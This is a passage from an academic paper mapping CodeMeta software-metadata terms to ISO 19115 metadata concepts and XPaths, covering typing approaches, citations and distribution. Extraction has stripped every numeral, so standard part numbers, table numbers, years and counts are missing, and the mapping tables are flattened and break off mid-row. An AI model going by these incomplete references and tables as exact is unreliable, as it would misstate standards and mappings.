e.g., organizations can include individuals, logos, and position names. this approach also facilitates reuse by allowing standard objects (e.g., people, organizations, or citations) to be referenced using links rather than repetitive content (https://geo-ide.noaa.gov/wiki/index.php?title=iso_components). another benefit of this approach in iso is the same as that in the schema.org case— communities can extend object definitions when necessary and, in the iso case, the resulting extended objects fit naturally into the iso xml representation. this approach is similar to the schema extension model used in codemeta to add properties deemed important by the codemeta community to the more general softwaresourcecode schema that is also a specialization of the schema.creativework schema. the namespace for each element in the xml is identified using a standard namespace prefix (mdb, cit, ...). asterisks are used in the xpaths to indicate locations where several objects can be used. for example, mdb:identificationinfo/*/ indicates that either mdb:md_ dataidentification or srv:sv_serviceidentification objects can occur in that location. a simplified notation is introduced for paths through the uml conceptual model in this document that includes only the role names and no information that is specific to the xml representation. for example, the xpath /mdb:md_metadata/mdb:identificationinfo/ mri:md_dataidentification/mri:resourcespecificusage/mri:md_usage/mri:identifiedissues/ cit:ci_ citation/cit:onlineresource/cit:ci_onlineresource/cit:linkage is replaced by the conceptpath:identificationinfo.resourcespecificusage.identifiedissues.onlineresource.linkage. these simplified ‘‘concept paths’’ improve readability and emphasize equivalences between codemeta and iso in the conceptual space. specific xpaths can be constructed from these concept paths when necessary to implement translation of existing iso content to codemeta representations. the reverse translation is not unique. codemeta specifies a vocabulary rather than a structural model. it includes properties from several schema.org schemas listed in table along with the number of items from each schema (crosswalk data, ). these schemas exist in a schema.org hierarchy which is similar in many ways to the iso structure. softwareapplication and softwaresourcecode schemas are both specializations of the thing >creativework schema. codemeta extends these schemas (in codemeta.softwaresourcecode) with several properties that lack clear equivalents in schema.org. hard types and soft types all standards and vocabularies need to make choices between hard or soft typing of objects they are describing. hard typing requires specific names for items and is the only choice available in implementations where names alone can be used to distinguish habermann ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://geo-ide.noaa.gov/wiki/index.php?title=iso_components http://dx.doi.org/ . /peerj-cs. table schema.org schemas and item counts for codemeta vocabulary. source #terms source #terms schema:creativework schema:thing schema:softwareapplication schema:softwaresourcecode codemeta:softwaresourcecode schema (not mapped) schema:person between items, e.g., codemeta. for example, if publication and revision dates are required for complete descriptions of a resource, hard typed representations would include two items: e.g., publicationdate and revisiondate. soft typing can be used in dialects which support item attributes as well as values, e.g., xml. in that case, these two dates would be represented with the same name (xml element) and distinguished by a type attribute: <datetype=’’publication’’>and <datetype=’’revision’’>. the difference between these two approaches emerges as the dialects evolve. hard types evolve by adding new elements to the underlying model, e.g., adding creationdate (or some other type of date) when it becomes apparent that it is needed, and unambiguous definitions of those elements. soft types evolve by adding items to the shared vocabulary of date types, typically a codelist or thesaurus. the critical difference between hard and soft types boils down to differences in governance models and change tolerance. in communities that use hard types, members must be tolerant to changes in the models and, typically, changes in tooling built on them. communities that use soft typing must have mechanisms for sharing and evolving vocabularies, typically control bodies or rules. the iso model is soft-typed and the codemeta model is hard-typed. table lists some of the documentation concepts that illustrate the contrast between these approaches. the first row shows the differences in how dates are treated. the codemeta vocabulary includes four types of dates listed in the second column of table . if other date types are required to describe software, maybe datedeprecated for example, new terms would be found in schema.org or added to the vocabulary to address those needs. the iso approach involves a single date concept and a codelist that includes sixteen options, shown in the third column of table . that codelist is designed to be extended by communities with other needs without impacting the structure of the standard. in this example, the date type codelist already includes the term ‘‘deprecated’’. citations connecting users to resources is one of the most important roles of metadata. it is also one of the most ubiquitous. several classes of citations are important. citation to the resource being described in the metadata (resource citation). the role of these citations is to provide guidance on how the resource being described should be cited and there is only one of these in each metadata record. citations to related resources (related resource citation). these are generic references to some other resource and generally include information about the relationship between the resource being described and the related resource. see, for example, the relatedidentifier element in the datacite metadata schema (datacite habermann ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table codemeta hard types and related iso codelists. item codemeta items iso - codelist valuesa dates embargodate datecreated datemodified datepublished ci_datetypecode: creation publication revision expiry lastupdate lastrevision nextupdate unavailable inforce adopted deprecated superseded validitybegins validityexpires released distribution people and organizations author contributor creator copyrightholder editor funder producer provider publisher sponsor affiliation ci_rolecode: resourceprovider custodian owner user distributor originator pointofcontact principalinvestigator processor publisher author sponsor coauthor collaborator editor mediator rightsholder contributor funder stakeholder maintainer online resource types buildinstructions contintegration issuetracker readme id identifier downloadurl installurl coderepository relatedlink sameas url ci_onlinefunctioncode: download information offlineaccess order search completemetadata browsegraphic upload emailservice browsing fileaccess associations supportingdata ds_associationtypecode: crossreference largerworkcitation partofseamlessdatabase stereomate iscomposedof collectivetitle series dependency revisionof keyword keywords programminglanguage applicationcategory applicationsubcategory md_keywordtypecode: discipline place stratum temporal theme datacentre featuretype instrument platform process project service product subtopiccategory taxon notes. aiso - codelists from https://standards.iso.org/iso/ /resources/codelists/cat/codelists.html . metadata working group, ) which includes relatedidentifiertype and relationtype attributes as additional information. citations to other, typically specific, resources (specific resource citations). for example, the iso object that describes data processing includes a citation in the role of softwarereference that specifically provides a reference to software used in the processing. other examples of these citation types are included in the following discussion. iso citations iso - includes all three types of citations: • the resource citation is unique and occurs at a specific location in the conceptual model: identificationinfo.citation (xpath = /mdb:md_metadata/mdb:identification info/*/mri:citation/cit:ci_citation). • related resource citations also occur at a specific location in the model, identifica- tioninfo.associatedresource (xpath = /mdb:md_metadata/mdb:identificationinfo/*/ mri:associatedresource/mri:md_associatedresource/mri:name/cit:ci_citation along with two codelists (associationtype and initiativetype) that provide information about how the resource is associated.). • specific resource citations occur in a number of locations in the iso model as part of specific classes. for example, citations to additional documentation occur at identificationinfo.additionaldocumentation and citations to quality reports occur at dataqualityinfo.standalonequalityreport. all iso citations include elements of traditional citations to books or papers e.g., title, authors (people or organizations in many roles), dates (many types), series information, habermann ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://standards.iso.org/iso/ /resources/codelists/cat/codelists.html http://dx.doi.org/ . /peerj-cs. table relative xpaths to titles, identifiers, and urls in iso citations. item xpath from ci_citation title cit:ci_citation/cit:title/gco:characterstring (concept= title) identifier cit:ci_citation/cit:identifier/mcc:md_identifier/mcc:code/gco:characterstring (concept = identifier.code) url cit:ci_citation/cit:onlineresource/cit:ci_onlineresource/cit:linkage/gco:characterstring (concept=onlineresource.linkage) page numbers, etc., as well as identifiers (issn, isbn, and other types) and urls with titles, descriptions and types. the xpaths to these items from each iso citation root are shown in table . codemeta citations codemeta includes twenty-six terms that represent resources that are related to or support the use of the software being described. these terms have several different types (text, url, text or url, creativework, creativework or url, computer language or text, ...). in the mappings below, these terms are mapped to the iso citations. the specific types can be described by adding the paths in table to the concept or xpaths. distribution many of the distribution systems for geographic data described by iso metadata include repositories (generally called archives or data centers) that manage and preserve data while providing on-going support for users. iso metadata standards accommodate approaches to resource distribution with or without descriptions of repositories (termed distributors) and each repository can provide several urls (transferoptions) for each resource. these onlineresources can have any of the functions included in the ci_onlinefunctioncode codelist in table . the most common online functions are download and information and these are used in the mappings to indicate direct access to the resource (function =download) or information about the resource (function =information). additional documentation the codemeta vocabulary includes many items that are intended to help users use and understand the software described in the metadata. in the iso standards, these items can be described in two ways: as associated resources (identificationinfo.associatedresource) or as additional documentation (identificationinfo.additionaldocumentation). i have chosen the later in these cases. in dialects without specific citations, e.g., datacite, these would be referred to as relatedidentifiers with appropriate relationtypes as the datacite dialect is soft typed (datacite metadata working group, ). one important goal of codemeta is to enable authors to cite software that is used to store, process, analyze, and visualize the data and model results that they use in their work. increasing citations from the scientific literature is large part of this goal, but there are also significant opportunities to improve the completeness of dataset metadata by citing software. this is generally done as part of the provenance or lineage section of the metadata. the iso standards provide several specific resource citations for citing software, including: habermann ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. • resourcelineage.processstep.processinginformation.algorithm.citation, • resourcelineage.processstep.processinginformation.softwarereference, and • resourcelineage.processstep.processinginformation.documentation. mappings the mappings between codemeta and iso are presented here in a series of tables that correspond to the source schema.org schemas used in order to provide some structure that may help clarify the relationships and improve understanding. the process of creating the mappings involved three steps: ( ) obvious connections, i.e., description ->identificationinfo.abstract, or name ->identificationinfo.citation.title, ( ) more complicated connections like those discussed above, and ( ) matching intended types as closely as possible, i.e., codemeta terms that were intended to be identifiers were mapped to iso identifier codes (identifier ->identificationinfo.citation.identifier.code) and those that were intended to be urls were mapped to iso linkages (downloadurl ->distributioninfo.transferoptions.online[function =’download’].linkage). this process is, of course, more subjective than objective, and the resulting mappings reflect experience authoring the iso standards and working with them in multiple contexts over the last decade. the mappings include the property names, types, and descriptions from the codemeta vocabulary, conceptual paths for the iso items (iso - , ), and xpaths from the standard xml representation (iso - , ). the conceptual paths are provided here in lieu of the iso definitions for simplicity. the complete iso conceptual model with definitions is available in an html view (iso conceptual model, ). in some cases, multiple codemeta terms are mapped to single iso elements, as described in the additional documentation section above. these cases are marked with * in the tables. these mappings are also available in machine-readable forms (habermann, b; habermann, c). schema:person the schema.person schema provides a vocabulary for properties of people. in the iso standards, people and organizations are both referred to as parties and names can be given as any combination of individual names, organization names, or positions. this mapping includes seven items listed in table . schema:thing the schema.thing schema provides a vocabulary for properties of the most generic type of item. in the context of codemeta, this item is the resource described by the metadata which is software. in iso - ( ), properties related to the identification of the resource being described are in the identificationinfo section and many of the properties are included in the citation to that resource. as described above, these properties (title, identifier, and link) are included in all citations in the iso model. this mapping includes six items listed in table . habermann ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table mapping of codemeta terms from the schema.person schema to iso - and iso - . property type description iso - iso - address postaladdress or text physical address of the item. party.contactinfo.address. deliverypoint cit:party/cit:ci_organisation/ cit:contactinfo/cit:ci_contact/ cit:address/cit:ci_address/cit: deliverypoint/gco:characterstring affiliation text an organization that this person is affiliated with. for example, a school/university party.namea cit:party/cit:ci_organisation/ cit:name/gco:characterstring email text email address party.contactinfo.address. electronicmailaddress cit:party/cit:ci_organisation/ cit:contactinfo/cit:ci_contact/ cit:address/cit:ci_address/ cit:electronicmailaddress/ gco:characterstring familyname text family name. in the us the last name of an person. this can be used along with givenname in- stead of the name property. party.namea cit:party/cit:ci_individual/ cit:name/gco:characterstring givenname text given name. in the us the first name of a person. this can be used along with familyname in- stead of the name property party.namea cit:party/cit:ci_individual/ cit:name/gco:characterstring identifier url url identifer, ideally an orcid id for individuals, a fundref id for funders party.partyidentifier.code cit:party/cit:ci_organisation/ cit:partyidentifier/mcc: md_identifier/mcc:code/ gco:characterstring name text the name of an organization, or if separate given and family names cannot be resolved, for a person party.namea cit:party/cit:ci_organisation/ cit:name/gco:characterstring notes. amultiple codemeta terms are mapped to this iso xml element, some with different attributes. schema:thing.creativework the thing.creativework schema provides a vocabulary for the most generic kind of creative work, including books, movies, photographs, software programs, etc. this mapping includes twenty-four items listed in table . schema:thing.creativework.softwaresourcecode the thing.creativework.softwaresourcecode schema provides a vocabulary for describing computer programming source code. this mapping includes four items listed in table . codemeta:softwaresourcecode thecodemeta:softwaresourcecodeschemaextendsthing.creativework.softwaresourcecode with terms created by the codemeta project. this mapping includes ten items listed in table . habermann ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table mapping of codemeta terms from the schema.thing schema to iso - and iso - . property type description iso - iso - description text a description of the item. identificationinfo.abstract /mdb:md_metadata/mdb:identificationinfo/*/mri:abstract/gco:characterstring identifier propertyvalue or url the identifier property represents any kind of identifier for any kind of thing, such as isbns, gtin codes, uuids etc. schema.org provides dedicated properties for representing many of these, either as textual strings or as url (uri) links. see background notes for more details. identificationinfo.citation.identifier.code /mdb:md_metadata/mdb:identificationinfo/*/mri:citation/cit:ci_citation/cit:identifier/ mcc:md_identifier/mcc:code name text the name of the item (software, organiza- tion) identificationinfo.citation.title /mdb:md_metadata/mdb:identificationinfo/*/mri:citation/cit:ci_citation/cit:title/ gco:characterstring relatedlink url a link related to this object, e.g., related web pages identificationinfo.citation.onlineresource [function=’information’]a /mdb:md_metadata/mdb:identificationinfo/*/mri:citation/cit:ci_citation/cit:onlineresource/ cit:ci_onlineresource/mdb:md_metadata/mdb:identificationinfo/*/mri:citation/ cit:ci_citation/cit:onlineresource/cit:ci_onlineresource[gmd:function/ gmd:ci_onlinefunctioncode,’information’]/cit:linkage sameas url url of a reference web page that unam- biguously indicates the item’s identity. e.g. the url of the item’s wikipedia page, wikidata entry, or official website. identificationinfo.citation.onlineresource [function=’information’]a /mdb:md_metadata/mdb:identificationinfo/*/mri:citation/cit:ci_citation/cit:onlineresource/ cit:ci_onlineresource/mdb:md_metadata/mdb:identificationinfo/*/mri:citation/ cit:ci_citation/cit:onlineresource/cit:ci_onlineresource[gmd:function/ gmd:ci_onlinefunctioncode,’information’]/cit:linkage url url url of the item. identificationinfo.citation.onlineresource [function=’download’]a /mdb:md_metadata/mdb:identificationinfo/*/mri:citation/ cit:ci_citation/cit:onlineresource/cit:ci_onlineresource[gmd:function/ gmd:ci_onlinefunctioncode,’download’]/cit:linkage notes. amultiple codemeta terms are mapped to this iso xml element, some with different attributes. h aberm ann ( ),p eerj c om put.s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table mapping of codemeta terms from the thing.creativework schema to iso - and iso - . property type description iso - iso - aauthor organization or person the author of this content or rating. please note that author is special in that html provides a special mechanism for indicating authorship via the rel tag. that is equivalent to this and may be used in- terchangeably. identificationinfo.citation. citedresponsi- bleparty[role=’author’].party.name or identifi- cationinfo.citation. citedresponsibleparty[role =’originator’].party.name /mdb:md_metadata/mdb:identificationinfo/*/mri:citation/cit:ci_citation/ cit:citedresponsibleparty/cit:ci_responsibility[cit:role/cit:ci_rolecode =’author’] or /mdb:md_metadata/mdb:identificationinfo/*/mri:citation/cit:ci_citation/ cit:citedresponsibleparty/cit:ci_responsibility[cit:role/cit:ci_rolecode =’originator’] citation creativework or url a citation or reference to another creative work, such as another publication, web page, scholarly article, etc. identificationinfo.associatedresource.namea /mdb:md_metadata/mdb:identificationinfo/*/mri:associatedresource/ mri:md_associatedresource/mri:name/cit:ci_citation contributor organization or person a secondary contributor to the creative- work or event. identificationinfo.citation.citedresponsibleparty [not(role=’author’ or role =’principalinvestigator’ or role =’originator’)].party.namea /mdb:md_metadata/mdb:identificationinfo/*/mri:citation/ cit:ci_citation/cit:citedresponsibleparty/cit:ci_responsibility[not (cit:role/cit:ci_rolecode=’author’ or cit:role/cit:ci_rolecode =’principalinvestigator’ or cit:role/cit:ci_rolecode =’originator’)]/cit:party/*/cit:name copyright holder organization or person the party holding the legal copyright to the creativework. identificationinfo.resourceconstraints.reference. citedresponsibleparty /mdb:md_metadata/mdb:identificationinfo/*/mri:resourceconstraints/ mco:md_legalconstraints/mco:reference/cit:ci_citation/ cit:citedresponsibleparty/cit:ci_responsibility copyright year number the year during which the claimed copy- right for the creativework was first as- serted. identificationinfo.resourceconstraints.reference. date[datetype=’publication’].date /mdb:md_metadata/mdb:identificationinfo/*/mri:resourceconstraints/ mco:md_legalconstraints/mco:reference/cit:ci_citation/ cit:date/cit:ci_date[cit:datetype/cit:ci_datetypecode =’publication’]/cit:datetype creator organization or person the creator/author of this creativework. this is the same as the author property for creativework. identificationinfo.citation.citedresponsibleparty [role=’author’].party.name or identifica- tioninfo.citation.citedresponsibleparty[role =’originator’].party.namea /mdb:md_metadata/mdb:identificationinfo/*/mri:citation/cit:ci_citation/ cit:citedresponsibleparty/cit:ci_responsibility[cit:role/cit:ci_rolecode =’author’] or /mdb:md_metadata/mdb:identificationinfo/*/mri:citation/cit:ci_citation/ cit:citedresponsibleparty/cit:ci_responsibility[cit:role/cit:ci_rolecode =’originator’] date created date or date- time the date on which the creativework was created or the item was added to a datafeed. identificationinfo.citation.date[datetype =’creation’]. datea /mdb:md_metadata/mdb:identificationinfo/*/mri:citation/ cit:ci_citation/cit:date/cit:ci_date[cit:datetype/cit:ci_datetypecode =’creation’]/cit:date/gco:datetime date modified date or date- time the date on which the creativework was most recently modified or when the item’s entry was modified within a datafeed. identificationinfo.citation.date[datetype =’revision’]. datea /mdb:md_metadata/mdb:identificationinfo/*/mri:citation/cit:ci_citation/ cit:date/cit:ci_date[cit:datetype/cit:ci_datetypecode =’revision’]/cit:date/gco:datetime date published date date of first broadcast/publication. identificationinfo.citation.date[datetype =’publication’].datea /mdb:md_metadata/mdb:identificationinfo/*/mri:citation/cit:ci_citation/ cit:date/cit:ci_date[cit:datetype/cit:ci_datetypecode =’publication’]/cit:date/gco:date editor person specifies the person who edited the cre- ativework. identificationinfo.citation.citedresponsibleparty [role=’editor’].party.namea /mdb:md_metadata/mdb:identificationinfo/*/mri:citation/cit:ci_citation/ cit:citedresponsibleparty/ cit:ci_responsibility[cit:role/cit:ci_rolecode =’editor’] (continued on next page) h aberm ann ( ),p eerj c om put.s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table (continued) property type description iso - iso - encoding mediaobject a media object that encodes this creative- work. this property is a synonym for as- sociatedmedia. supersedes encodings. fileformat text or url media type, typically mime format (see iana site) of the content e.g., applica- tion/zip of a softwareapplication binary. in cases where a creativework has several media type representations, ’encoding’ can be used to indicate each mediaobject alongside particular fileformat informa- tion. unregistered or niche file formats can be indicated instead via the most ap- propriate url, e.g., defining web page or a wikipedia entry. identificationinfo.resourceformat. formatspecifi- cationcitation /mdb:md_metadata/mdb:identificationinfo/mri:md_dataidentification/ mri:resourceformat/mrd:md_format/mrd:formatspecificationcitation/ cit:ci_citation funder organization or person a person or organization that supports (sponsors) something through some kind of financial contribution. identificationinfo.citation.citedresponsibleparty [role=’funder’].party.namea /mdb:md_metadata/mdb:identificationinfo/*/mri:citation/cit:ci_citation/ cit:citedresponsibleparty/cit:ci_responsibility[cit:role/cit:ci_rolecode =’funder’] haspart creativework indicates a creativework that is (in some sense) a part of this creativework. re- verse property ispartof identificationinfo.associatedresource [associa- tiontype=’iscomposedof’].namea /mdb:md_metadata/mdb:identificationinfo/*/mri:associatedresource/ mri:md_associatedresource[mri:associationtype/mri:ds_associationtypecode =’iscomposedof’]/mri:name/cit:ci_citation isaccessibleforfree boolean a flag to signal that the publication is ac- cessible for free. distributioninfo.distributionformat.format distributor.distributionorderprocess.fees /mdb:md_metadata/mdb:distributioninfo/mrd:md_distribution/ mrd:distributionformat/mrd:md_format/mrd:formatdistributor/ mrd:md_distributor/mrd:distributionorderprocess/ mrd:md_standardorderprocess/mrd:fees ispartof creativework indicates a creativework that this cre- ativework is (in some sense) part of. re- verse property haspart identificationinfo.associatedresource [associa- tiontype=’largerworkcitation’].namea /mdb:md_metadata/mdb:identificationinfo/*/mri:associatedresource/ mri:md_associatedresource[mri:associationtype/mri:ds_associationtypecode =’largerworkcitation’]/mri:name/cit:ci_citation keywords text keywords or tags used to describe this content. multiple entries in a keywords list are typically delimited by commas. identificationinfo.descriptivekeywords[type =’theme’]. keyworda /mdb:md_metadata/mdb:identificationinfo/*/mri:descriptivekeywords/ mri:md_keywords[mri:type/mri:md_keywordtypecode =’theme’]/mri:keyword/gco:characterstring license creativework or url a license document that applies to this content, typically indicated by url. identificationinfo.resourceconstraints.reference /mdb:md_metadata/mdb:identificationinfo/mri:md_dataidentification/ mri:resourceconstraints/mco:md_legalconstraints/mco:reference/cit:ci_citation position integer or text the position of an item in a series or se- quence of items. (while schema.org con- siders this a property of creativework, it is also the way to indicate ordering in any list (e.g., the authors list). by default ar- rays are unordered in json-ld producer organization or person the person or organization who produced the work (e.g., music album, movie, tv/ra- dio series etc.). identificationinfo.citation.citedresponsibleparty [role=’creator’].party.namea /mdb:md_metadata/mdb:identificationinfo/*/mri:citation/cit:ci_citation/ cit:citedresponsibleparty/cit:ci_responsibility[cit:role/cit:ci_rolecode =’creator’]/cit:party/a provider organization or person the service provider, service operator, or service performer; the goods pro- ducer. another party (a seller) may offer those services or goods on behalf of the provider. a provider may also serve as the seller. supersedes carrier. identificationinfo.pointofcontact [role =’pointofcontact’].party.namea /mdb:md_metadata/mdb:identificationinfo/srv:sv_serviceidentification/ mri:pointofcontact/cit:ci_responsibility[cit:role/cit:ci_rolecode =’provider’]/cit:party/* (continued on next page) h aberm ann ( ),p eerj c om put.s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table (continued) property type description iso - iso - publisher organization or person the publisher of the creative work. identificationinfo.citation.citedresponsibleparty [role=’publisher’].party.namea /mdb:md_metadata/mdb:identificationinfo/*/mri:citation/cit:ci_citation/ cit:citedresponsibleparty/cit:ci_responsibility[cit:role/cit:ci_rolecode =’publisher’]/cit:party/a sponsor organization or person a person or organization that supports a thing through a pledge, promise, or fi- nancial contribution. e.g., a sponsor of a medical study or a corporate sponsor of an event. identificationinfo.citation.citedresponsibleparty [role=’sponsor’].party.namea /mdb:md_metadata/mdb:identificationinfo/*/mri:citation/cit:ci_citation/ cit:citedresponsibleparty/cit:ci_responsibility[cit:role/cit:ci_rolecode =’sponsor’]/cit:party/a version number or text the version of the creativework embod- ied by a specified resource. identificationinfo.citation.edition /mdb:md_metadata/mdb:identificationinfo/mri:md_dataidentification/mri:citation/ cit:ci_citation/cit:edition/gco:characterstring notes. amultiple codemeta terms are mapped to this iso xml element, some with different attributes. h aberm ann ( ),p eerj c om put.s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table mapping of codemeta terms from the thing.creativework.softwaresourcecode schema to iso - and iso - . property type description iso - iso - code repository url link to the repository where the un- compiled, human readable code and re- lated code is located (svn, github, code- plex). distributioninfo.distributor.distributor transferoptions.online[function =’download’].linkage or distribution- info.distributor.distributortransferoptions. online[function=’information’].linkage or distributioninfo.transferoptions.online [function=’download’].linkage or distributioninfo.transferoptions.online [function=’information’].linkage or identificationinfo.citation.onlineresource [function=’download’].linkage or identificationinfo.citation.onlineresource [function=’information’].linkage* /mdb:md_metadata/mdb:distributioninfo/mrd:md_distribution/ mrd:distributor/mrd:mddistributor/mrd:distributortransferoptions/ mrd:mddigitaltransferoptions/mrd:online/cit:ci_onlineresource[cit: function/cit:ci_onlinefunctioncode =’information’]/ cit:linkage/gco:characterstring or /mdb:md_metadata/ mdb:distributioninfo/mrd:md_distribution/mrd:transferoptions/ mrd:mddigitaltransferoptions/mrd:online/cit:ci_onlineresource [cit:function/cit:ci_onlinefunctioncode =’information’]/ cit:linkage/gco:characterstring or /mdb:md_metadata/ mdb:identificationinfo/*/mri:citation/cit:ci_citation/ cit:onlineresource/cit:ci_onlineresource[cit:function/ cit:ci_onlinefunctioncode =’information’] /cit:linkage/ gco:characterstring or /mdb:md_metadata/mdb:distributioninfo/ mrd:md_distribution/mrd:distributor/mrd:mddistributor/ mrd:distributortransferoptions/mrd:mddigitaltransferoptions/ mrd:online/cit:ci_onlineresource[cit:function/ cit:ci_onlinefunctioncode =’download’] /cit:linkage/ gco:characterstring or /mdb:md_metadata/mdb:distributioninfo/ mrd:md_distribution/mrd:transferoptions/mrd:mddigitaltransferoptions/ mrd:online/cit:ci_onlineresource[cit:function/ cit:ci_onlinefunctioncode =’download’] /cit:linkage/ gco:characterstring or /mdb:md_metadata/mdb:identificationinfo/*/ mri:citation/cit:ci_citation/cit:onlineresource/ cit:ci_onlineresource[cit:function/ cit:ci_onlinefunctioncode =’download’] /cit:linkage/gco:characterstring programminglanguage computer lan- guage or text the computer programming language. identificationinfo.descriptivekeywords[type =’theme’]. keyworda /mdb:md_metadata/mdb:identificationinfo/*/mri:descriptivekeywords/ mri:md_keywords[mri:type/mri:md_keywordtypecode =’theme’]/mri:keyword/gco:characterstring runtime platform text runtime platform or script interpreter dependencies (example—java v , python . , .net framework . ). supersedes runtime. identificationinfo.environmentdescriptiona /mdb:md_metadata/mdb:identificationinfo/mri:md_dataidentification/ mri:environmentdescription/gco:characterstring target product software appli- cation target operating system/product to which the code applies. if applies to sev- eral versions, just the product name can be used. identificationinfo.associatedresource.namea /mdb:md_metadata/mdb:identificationinfo/*/mri:associatedresource/ mri:md_associatedresource/mri:name/cit:ci_citation notes. amultiple codemeta terms are mapped to this iso xml element, some with different attributes. h aberm ann ( ),p eerj c om put.s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table mapping of codemeta terms from the codemeta.softwaresourcecode schema to iso - and iso - . property type description iso - iso - build instructions url link to installation instructions/documen- tation identificationinfo.additionaldocumentationa /mdb:md_metadata/mdb:identificationinfo/*/ mri:additionaldocumentation/cit:ci_citation cont integration url link to continuous integration service identificationinfo.additionaldocumentationa /mdb:md_metadata/mdb:identificationinfo/*/ mri:additionaldocumentation/cit:ci_citation developmentstatus text description of development status, e.g., active, inactive, supsended. see reposta- tus.org identificationinfo.status /mdb:md_metadata/mdb:identificationinfo/*/ mri:status/mcc:md_progresscode embargo date date software may be embargoed from public access until a specified date (e.g., pending publication, year from publication) identificationinfo.citation.date[datetype =’released’]. datea /mdb:md_metadata/mdb:identificationinfo/*/mri:citation/ cit:ci_citation/cit:date/cit:ci_date[cit:datetype/ cit:ci_datetypecode =’released’]/cit:date/gco:datetime funding text funding source (e.g., specific grant) identificationinfo.associatedresourcea /mdb:md_metadata/mdb:identificationinfo/*/ mri: associatedresource/mri:md_associatedresource/mri:name/cit:ci_citation issuetracker url link to software bug reporting or issue tracking system identificationinfo.resourcespecificusage. identifiedissues.onlineresource.linkage /mdb:md_metadata/mdb:identificationinfo/*/mri: resourcespecificusage/mri:md_usage/mri:identifiedissues/cit:ci_citation maintainer person individual responsible for maintaining the software (usually includes an email con- tact address) identificationinfo.pointofcontact /mdb:md_metadata/mdb:identificationinfo/*/mri:pointofcontact readme url link to software readme file identificationinfo.additionaldocumentationa /mdb:md_metadata/mdb:identificationinfo/*/ mri:additionaldocumentation/cit:ci_citation reference publication scholarlyarticle an academic publication related to the software. identificationinfo.additionaldocumentationa /mdb:md_metadata/mdb:identificationinfo/*/ mri:additionaldocumentation/cit:ci_citation software suggestions softwaresourcecode optional dependencies, e.g., for optional features, code development, etc identificationinfo.additionaldocumentationa /mdb:md_metadata/mdb:identificationinfo/*/ mri:additionaldocumentation/cit:ci_citation notes. amultiple codemeta terms are mapped to this iso xml element, some with different attributes. h aberm ann ( ),p eerj c om put.s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. schema:thing.creativework.softwareapplication the thing.creativework.softwareapplication schema provides a vocabulary for describing a software application. this mapping includes fifteen items listed in table . conclusions the iso metadata standards were originally developed by iso technical committee to serve as the standard and structured part of the documentation needed to discover, access, use, and understand datasets. the standards acknowledge that they are generic, and they include several mechanisms for extension to address specific needs of communities that build on the standards. the generic nature of these standards is reflected in the breadth of the codelist that can be used to describe the scope of a particular metadata record (see list in model characteristics section above and habermann, a; habermann, b; habermann, c). the codemeta project recently proposed over sixty terms that can be used in metadata for software. this recommendation provides a framework that provides insight into what iso metadata for software might contain. the iso metadata standards include several elements that directly cite software, e.g., the processinginformation.softwarereference or algorithm.citation elements, and the primary purpose of the mappings proposed here is to support iso users that want to ( ) express software metadata in a dialect that they are familiar with and ( ) to facilitate translation of software metadata written using iso standards to codemeta-compliant json-ld. note that the purpose is different than the primary purpose of the crosswalks proposed on the codemeta project site which is to facilitate automated translations between different json-ld vocabularies and rdf. adding an iso crosswalk to the codemeta framework was the original goal of this work, but the differences identified and described here are significant enough to make that impossible. this translation may be facilitated with an xslt built specifically for that purpose, like the one created by peroni, lapeyre & shotton, , but that is beyond the scope of this initial comparison. the process of creating a mapping between these two representations surfaced some differences that complicate the mapping. some of these differences are related to hard and soft typing used in the two models and others are related to increased flexibility that is required in a generic standard like iso for documenting citations, distribution channels, and related resources. the differences in approach described here probably apply to many mappings from xml to rdf representations. peroni, lapeyre & shotton, identified and discussed some similar challenges when mapping between jats xml and spar ontologies. they attributed these differences to ‘‘differing philosophical viewpoints for xml and rdf’’, then described two reasons that xml element names are ambiguous when used in isolation: attributes and hierarchical structure. they suggest that the jats standard (and by implication all xml representations) is ‘‘deliberately vague’’ and that the hierarchical structure of xml is ‘‘not formalized and implicitly lives outside the xml schema of the language’’. it is certainly true that xml element names can be ambiguous without habermann ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table mapping of codemeta terms from the schema:thing.creativework.softwareapplication schema to iso - and - . property type description iso - iso - application category text or url type of software application, e.g., ’game, multimedia’. identificationinfo.descriptivekeywords[type =’theme’].keyword* /mdb:md_metadata/mdb:identificationinfo/*/mri:descriptivekeywords/ mri:md_keywords[mri:type/mri:md_keywordtypecode =’theme’]/ mri:keyword/gco:characterstring application subcategory text or url subcategory of the application, e.g., ‘arcade game’. identificationinfo.descriptivekeywords[type =’theme’].keyword* /mdb:md_metadata/mdb:identificationinfo/*/mri:descriptivekeywords/ mri:md_keywords[mri:type/mri:md_keywordtypecode =’theme’]/mri:keyword/ gco:characterstring download url url if the file can be downloaded, url to download the binary. distributioninfo.distributor.distributor transferoptions.online[function =’download’].linkage or distributioninfo.transfer options.online[function =’download’].linkage or identification- info.citation.onlineresource[function =’download’].linkage /mdb:md_metadata/mdb:distributioninfo/mrd:md_distribution/ mrd:distributor/mrd:md_distributor/mrd:distributortransferoptions/ mrd:md_digitaltransferoptions/mrd:online/cit:ci_onlineresource [cit:function/cit:ci_onlinefunctioncode =’download’]/ cit:linkage/gco:characterstring or /mdb:md_metadata/ mdb:distributioninfo/mrd:md_distribution/mrd:transferoptions/ mrd:md_digitaltransferoptions/mrd:online/cit:ci_onlineresource [cit:function/cit:ci_onlinefunctioncode =’download’] / cit:linkage/gco:characterstring or /mdb:md_metadata/ mdb:identificationinfo/*/mri:citation/cit:ci_citation/ cit:onlineresource/cit:ci_onlineresource[cit:function/ cit:ci_onlinefunctioncode =’download’] /cit:linkage/gco:characterstring filesize text size of the 